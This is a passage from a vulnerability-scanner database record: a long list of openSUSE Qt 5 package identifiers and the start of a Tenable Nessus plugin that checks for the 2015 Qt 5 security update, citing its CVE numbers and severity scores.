"p-cpe:/a:novell:opensuse:libQt5Declarative5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebkit-examples-debugsource", "p-cpe:/a:novell:opensuse:libQt5WebSockets5-imports-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DCore5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5CLucene5", "p-cpe:/a:novell:opensuse:libQt5DBus-devel-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Gui-devel", "p-cpe:/a:novell:opensuse:libQt5WebKit5-imports-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtserialport-devel", "p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtlocation-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5DesignerComponents5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Widgets5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5X11Extras5-32bit", "p-cpe:/a:novell:opensuse:libQt5Test-devel", "p-cpe:/a:novell:opensuse:libQt53DQuick5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-examples", "p-cpe:/a:novell:opensuse:frameworkintegration-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtbase-platformtheme-gtk2", "p-cpe:/a:novell:opensuse:libQt53DLogic5-32bit", "p-cpe:/a:novell:opensuse:libQt5Script5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-tools", "p-cpe:/a:novell:opensuse:libQt53DRenderer-devel", "p-cpe:/a:novell:opensuse:libQt53DCore-devel", "p-cpe:/a:novell:opensuse:libqt5-qtct", "p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-devel", "p-cpe:/a:novell:opensuse:libQt5Gui-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtscript-debugsource", "p-cpe:/a:novell:opensuse:libQt5WebKit-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Widgets5", "p-cpe:/a:novell:opensuse:libQt5Sql-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwebkit-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5DBus5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5WebSockets5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5XmlPatterns5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-examples", "p-cpe:/a:novell:opensuse:libQt5SerialPort5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Xml-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtscript-devel", "p-cpe:/a:novell:opensuse:fcitx-qt5-32bit", "p-cpe:/a:novell:opensuse:libQt53DQuick5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5SerialPort5", "p-cpe:/a:novell:opensuse:libQt5Multimedia5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtimageformats-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-debugsource", "p-cpe:/a:novell:opensuse:libQt5Widgets5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Concurrent5", "p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-tools-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5DesignerComponents5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5WebSockets5-32bit", "p-cpe:/a:novell:opensuse:fcitx-qt5", "p-cpe:/a:novell:opensuse:libQtQuick5", "p-cpe:/a:novell:opensuse:libqt5-qtbase-examples", "p-cpe:/a:novell:opensuse:libQt5Bootstrap-devel-static-32bit", "p-cpe:/a:novell:opensuse:kwin5-lang", "p-cpe:/a:novell:opensuse:libQt5Declarative5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Gui-private-headers-devel", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:lxqt-powermanagement-debugsource", "p-cpe:/a:novell:opensuse:libKF5Style5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Bluetooth5-32bit", "p-cpe:/a:novell:opensuse:libQt5Test5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5X11Extras5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt53DQuickRenderer-devel", "p-cpe:/a:novell:opensuse:libQt5Positioning5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwebkit-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtsensors-private-headers-devel", "p-cpe:/a:novell:opensuse:fcitx-qt5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Concurrent5-32bit", "p-cpe:/a:novell:opensuse:libQt53DRenderer5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Concurrent-devel", "p-cpe:/a:novell:opensuse:libqt5-qtsvg-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-devel", "p-cpe:/a:novell:opensuse:libqt5-creator-debuginfo", "p-cpe:/a:novell:opensuse:libQt5PrintSupport5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Xml5-32bit", "p-cpe:/a:novell:opensuse:libQt5Designer5-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DCollision5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Test-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qttools-debuginfo-32bit", "p-cpe:/a:novell:opensuse:fcitx-qt5-debugsource", "p-cpe:/a:novell:opensuse:libQt5CLucene5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtsvg-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtserialport-debugsource", "p-cpe:/a:novell:opensuse:libQt5Xml5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Nfc5", "p-cpe:/a:novell:opensuse:libQt5Test-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5CLucene5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5WebChannel5-imports-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtdoc", "p-cpe:/a:novell:opensuse:libKF5Style5", "p-cpe:/a:novell:opensuse:libqt5-qtlocation-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt5PlatformHeaders-devel", "p-cpe:/a:novell:opensuse:libqt5-qtwayland", "p-cpe:/a:novell:opensuse:libQt5WebKit5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Declarative5", "p-cpe:/a:novell:opensuse:libQt5Bluetooth5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Widgets-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-debugsource", "p-cpe:/a:novell:opensuse:libQt5Sql5-mysql-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Network5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt53DInput5", "p-cpe:/a:novell:opensuse:libqt5-qt3d-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qtbase-examples-32bit", "p-cpe:/a:novell:opensuse:libQt5Location5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-debugsource", "p-cpe:/a:novell:opensuse:libQt5Svg5", "p-cpe:/a:novell:opensuse:libQt5Network5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5WaylandClient5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtlocation-examples", "p-cpe:/a:novell:opensuse:libQt5Core5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtscript-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5DBus-devel", "p-cpe:/a:novell:opensuse:kwayland-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5WebKit5-devel", "p-cpe:/a:novell:opensuse:libQt5Help5", "p-cpe:/a:novell:opensuse:libQt5Concurrent5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-mysql-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtlocation-debugsource", "p-cpe:/a:novell:opensuse:libQt5SerialPort5-32bit", "p-cpe:/a:novell:opensuse:libqt5-linguist-devel", "p-cpe:/a:novell:opensuse:libqt5-qttranslations", "p-cpe:/a:novell:opensuse:libQt5Designer5", "p-cpe:/a:novell:opensuse:libqt5-qttools-devel", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qttools-32bit", "p-cpe:/a:novell:opensuse:libQt5Xml-devel", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Nfc5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5PrintSupport-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt53DQuick5", "p-cpe:/a:novell:opensuse:libQt5Sensors5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtimageformats-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtx11extras-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qttools-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qtbase-common-devel-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtsensors-devel", "p-cpe:/a:novell:opensuse:libQt5Script5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Xml5", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets-devel-32bit", "p-cpe:/a:novell:opensuse:frameworkintegration-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5WebChannel5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Gui5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5DBus-devel-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libKF5Style5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5PlatformSupport-private-headers-devel", "p-cpe:/a:novell:opensuse:libKF5Style5-32bit", "p-cpe:/a:novell:opensuse:libQt5WebChannel5-32bit", "p-cpe:/a:novell:opensuse:kwayland-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-devel", "p-cpe:/a:novell:opensuse:libQt53DQuick-devel", "p-cpe:/a:novell:opensuse:kwin5-debugsource", "p-cpe:/a:novell:opensuse:libQt5Network-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5WaylandClient5", "p-cpe:/a:novell:opensuse:libQt5Sensors5-imports-debuginfo", "p-cpe:/a:novell:opensuse:libQt5PrintSupport-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-linguist-debuginfo", "p-cpe:/a:novell:opensuse:libQt5OpenGL-devel", "p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-debugsource", "p-cpe:/a:novell:opensuse:libQt5OpenGL-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Svg5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qt3d-imports", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-devel-32bit", "p-cpe:/a:novell:opensuse:calibre-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql-32bit", "p-cpe:/a:novell:opensuse:libQt5Gui5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qttools-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DLogic5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtscript-devel-32bit", "p-cpe:/a:novell:opensuse:lxqt-powermanagement-lang", "p-cpe:/a:novell:opensuse:libQt5OpenGL5", "p-cpe:/a:novell:opensuse:libQt5Core-devel", "p-cpe:/a:novell:opensuse:libQt5Widgets-devel", "p-cpe:/a:novell:opensuse:libQt5Multimedia5-debuginfo", "p-cpe:/a:novell:opensuse:lxqt-powermanagement-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtimageformats-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qt3d-devel", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-examples", "p-cpe:/a:novell:opensuse:libqt5-qtct-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Core-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Script5", "p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DQuick5-32bit", "p-cpe:/a:novell:opensuse:libQt5Widgets5-32bit", "p-cpe:/a:novell:opensuse:libQt5XmlPatterns5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qt3d-debugsource", "p-cpe:/a:novell:opensuse:libQt5WebSockets5", "p-cpe:/a:novell:opensuse:libqt5-qtbase-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Sql5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Xml5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Positioning5-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DInput5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtsvg-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:kwin5-devel", "p-cpe:/a:novell:opensuse:libqt5-qtsvg-devel", "p-cpe:/a:novell:opensuse:libqt5-qttools-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel", "p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-devel", "p-cpe:/a:novell:opensuse:libQt5WaylandClient5-32bit", "p-cpe:/a:novell:opensuse:libQt5SerialPort5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5OpenGL5-32bit", "p-cpe:/a:novell:opensuse:libQt5Bluetooth5-imports", "p-cpe:/a:novell:opensuse:libqt5-qttools-devel-32bit", "p-cpe:/a:novell:opensuse:libQt53DCore5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-examples", "p-cpe:/a:novell:opensuse:libqt5-qt3d-examples-debuginfo", "p-cpe:/a:novell:opensuse:kwayland-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-devel-32bit", "p-cpe:/a:novell:opensuse:libKF5Style5-lang", "p-cpe:/a:novell:opensuse:libQt5OpenGLExtensions-devel-static", "p-cpe:/a:novell:opensuse:calibre", "p-cpe:/a:novell:opensuse:libQt5Test5-32bit", "p-cpe:/a:novell:opensuse:libQtQuick5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql", "p-cpe:/a:novell:opensuse:kwin5", "p-cpe:/a:novell:opensuse:libQt5DBus-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Compositor5-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Test5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Concurrent5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Network-devel", "p-cpe:/a:novell:opensuse:libQt53DRenderer5", "p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-examples", "p-cpe:/a:novell:opensuse:libqt5-qt3d-imports-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DInput5-32bit", "p-cpe:/a:novell:opensuse:libQt53DCollision5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5", "p-cpe:/a:novell:opensuse:libqt5-qtx11extras-debugsource", "p-cpe:/a:novell:opensuse:libQt5Location5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5DBus-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5WaylandClient5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-examples", "p-cpe:/a:novell:opensuse:libqt5-qtwebkit-examples", "p-cpe:/a:novell:opensuse:libqt5-qttools-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qttools-examples", "p-cpe:/a:novell:opensuse:libQt53DCore5", "p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-debuginfo", "p-cpe:/a:novell:opensuse:libQt5X11Extras5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5XmlPatterns5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets-devel", "p-cpe:/a:novell:opensuse:frameworkintegration-plugin", "p-cpe:/a:novell:opensuse:libqt5-qtsensors-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Gui5", "p-cpe:/a:novell:opensuse:libQt5Nfc5-imports-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtsensors-debugsource", "p-cpe:/a:novell:opensuse:libQt5Core-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qtimageformats", "p-cpe:/a:novell:opensuse:libQt53DInput5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtsensors-examples", "p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-tools", "p-cpe:/a:novell:opensuse:libQt5Svg5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-debugsource", "p-cpe:/a:novell:opensuse:libQt5PrintSupport-devel", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Concurrent-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtbase-platformtheme-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:calibre-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-debugsource", "p-cpe:/a:novell:opensuse:lxqt-qtplugin-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite-32bit", "p-cpe:/a:novell:opensuse:kwayland", "p-cpe:/a:novell:opensuse:libQt5WebKit5", "p-cpe:/a:novell:opensuse:libQt5PrintSupport5-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DCollision-devel", "p-cpe:/a:novell:opensuse:libQt5WebKit5-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtscript-examples-debuginfo", "p-cpe:/a:novell:opensuse:kwayland-debuginfo", "p-cpe:/a:novell:opensuse:libQt5WebSockets5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtimageformats-debuginfo", "p-cpe:/a:novell:opensuse:libQt5DBus5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtbase-doc-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Nfc5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtgraphicaleffects", "p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-debugsource", "p-cpe:/a:novell:opensuse:libQt5PrintSupport5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtbase-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qttools", "p-cpe:/a:novell:opensuse:libQt53DLogic5", "p-cpe:/a:novell:opensuse:libQt53DLogic-devel", "p-cpe:/a:novell:opensuse:libqt5-linguist", "p-cpe:/a:novell:opensuse:libQt5Compositor5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5OpenGL-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5XmlPatterns5", "p-cpe:/a:novell:opensuse:fcitx-qt5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5PlatformSupport-devel-static-32bit", "p-cpe:/a:novell:opensuse:libQt5Help5-32bit", "p-cpe:/a:novell:opensuse:libQt53DLogic5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtscript-examples", "p-cpe:/a:novell:opensuse:libQt5WebChannel5-imports", "p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5DesignerComponents5-32bit", "p-cpe:/a:novell:opensuse:libQt5Bluetooth5-imports-debuginfo", "p-cpe:/a:novell:opensuse:libQt5X11Extras5", "p-cpe:/a:novell:opensuse:frameworkintegration-plugin-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Nfc5-32bit", "p-cpe:/a:novell:opensuse:libQt53DCollision5", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Sensors5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-32bit", "p-cpe:/a:novell:opensuse:lxqt-powermanagement", "p-cpe:/a:novell:opensuse:libQt53DCollision5-32bit", "p-cpe:/a:novell:opensuse:libQt5Bootstrap-devel-static", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-examples", "p-cpe:/a:novell:opensuse:libQt5Nfc5-imports", "p-cpe:/a:novell:opensuse:libQt5Positioning5-32bit", "p-cpe:/a:novell:opensuse:libQt5WebKit5-imports", "p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5OpenGL5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5CLucene5-debuginfo", "p-cpe:/a:novell:opensuse:libQtQuick5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtsvg-examples", "p-cpe:/a:novell:opensuse:libqt5-qtimageformats-devel", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Help5-debuginfo", "p-cpe:/a:novell:opensuse:libQt53DRenderer5-32bit", "p-cpe:/a:novell:opensuse:libQt5DBus5", "p-cpe:/a:novell:opensuse:libQt5Core5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-debugsource", "p-cpe:/a:novell:opensuse:libQt5Location5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Gui5-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Network5-32bit", "p-cpe:/a:novell:opensuse:libQt5Test5", "p-cpe:/a:novell:opensuse:libqt5-qtbase-common-devel", "p-cpe:/a:novell:opensuse:libqt5-creator", "p-cpe:/a:novell:opensuse:libQt5DBus5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQtQuick5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5OpenGL5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtbase-examples-debuginfo-32bit", "p-cpe:/a:novell:opensuse:frameworkintegration-plugin-debuginfo-32bit"], "id": "OPENSUSE-2015-953.NASL", "href": "https://www.tenable.com/plugins/nessus/87627", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-953.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87627);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8146\", \"CVE-2014-8147\", \"CVE-2015-1284\", \"CVE-2015-1290\", \"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1294\");\n\n script_name(english:\"openSUSE Security Update : Qt 5 (openSUSE-2015-953)\");\n script_summary(english:\"Check for the openSUSE-2015-953 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Qt 5 was updated to the 5.5.1 release to deliver upstream improvements\nand fixes to Qt functionality.\n\nThe following Security fixes are contained in QtWebEngineCore :\n\n - ICU: CVE-2014-8146, CVE-2014-8147\n\n - Blink: CVE-2015-1284, CVE-2015-1291, CVE-2015-1292\n\n - Skia: CVE-2015-1294\n\n - V8: CVE-2015-1290\n\nThe following packages were rebuilt because they use private headers :\n\n - calibre\n\n - fcitx-qt5\n\n - frameworkintegration\n\n - kwayland\n\n - kwin5,\n\n - lxqt-powermanagement\n\n - lxqt-qtplugin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=954149\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959178\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected Qt 5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:calibre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:calibre-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:calibre-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:fcitx-qt5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:fcitx-qt5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:fcitx-qt5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:fcitx-qt5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:fcitx-qt5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:fcitx-qt5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-plugin-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-plugin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:frameworkintegration-plugin-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwayland-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwin5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwin5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwin5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwin5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kwin5-lang\");\n 